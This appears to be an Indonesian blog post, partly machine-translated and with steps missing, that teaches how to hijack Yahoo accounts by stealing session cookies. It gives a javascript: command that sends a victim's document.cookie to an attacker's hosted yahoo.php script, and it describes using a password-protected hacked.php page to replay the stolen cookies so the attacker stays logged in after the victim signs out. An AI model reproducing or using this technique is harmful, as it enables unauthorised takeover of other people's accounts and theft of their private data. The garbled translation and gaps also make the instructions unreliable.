Pengarang: CR @ n SH Burn
Saya akan memberitahu Anda cara hack account yahoo oleh cookie mencuri atau kita dapat mengatakanmencuri ID sesi.
Pertama-tama saya ingin memberitahu anda dasar-dasar cookie.
Apa sesi cookie atau ID sesi?
Setiap kali kita masuk ke account itu menghasilkan sepotong tali yang unik. Satu salinan disimpan di serverdan lainnya di browser kita sebagai cookie. Keduanya cocok setiap kali kita melakukan sesuatu dalamaccount kita. Session cookies memungkinkan situs web yang Anda kunjungi untuk melacak perpindahanAnda dari halaman ke halaman sehingga Anda tidak mendapatkan meminta informasi yang sama Anda sudahdiberikan ke situs. Cookie memungkinkan Anda untuk melanjutkan melalui banyak halaman situs dengan cepat dan mudah tanpa harus mengotentikasi atau memproses ulang setiap daerah baru yang Anda kunjungi. Ini bagian dari sesi string atau login hancur ketika kita klik pada pilihan 'Sign Out'.
Cukup kunjungi yahoo.com. Ketik dalam browser
Code:
javascript:alert(document.cookie);
Anda akan mendapatkan kotak yang menampilkan pop up Anda cookie yang ditinggalkan oleh yahoo di PC kami.
Jadi itu berarti sesi disimpan di browser kita dalam bentuk cookie.
Namun dalam kasus yahoo, itu tidak sama. Penyerang tidak mendapatkan sign out ketika budak klik 'Sign out'. Meskipun sesi secara otomatis akan hancur setelah 24 jam oleh yahoo. Tapi ketika pengguna hanya menyegarkan jendela di account yahoo, dia mendapat sesi lagi untuk selanjutnya 24 jam. Ini berarti, setelah sesi akun yahoo dicuri, penyerang dapat mengakses account waktu hidup dengan jendela menyegarkan dalam setiap 24 jam. Saya tidak benar-benar yakin apakah 24 atau 48 nya jam.
Download the required script from here:
1. Daftar untuk Account di setiap situs web hosting gratis.
Saya telah memilih my3gb.com.
2. Sekarang login ke account Anda dan pergi ke file manager.
Code:
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));
Ketika budak menjalankan kode di browser, ia kembali akan redirect ke account yahoo nya.Quote:Here is Yahoo.php basically a cookie stealing script and hacked.php executes the stolen cookies in browser.Stolen cookies get stored in directory 'cookies'
5. Sekarang buka hacked.php tersebut.
Url would be: http://yourdomain.com/hacked.php
Dan masukkan password (password default adalah CR @ 5H n BURN)
Sekarang tidak masalah jika budak tanda-tanda keluar dari account-nya, Anda akan tetap masuk ke dalamnya.
Tidak ada komentar:
Posting Komentar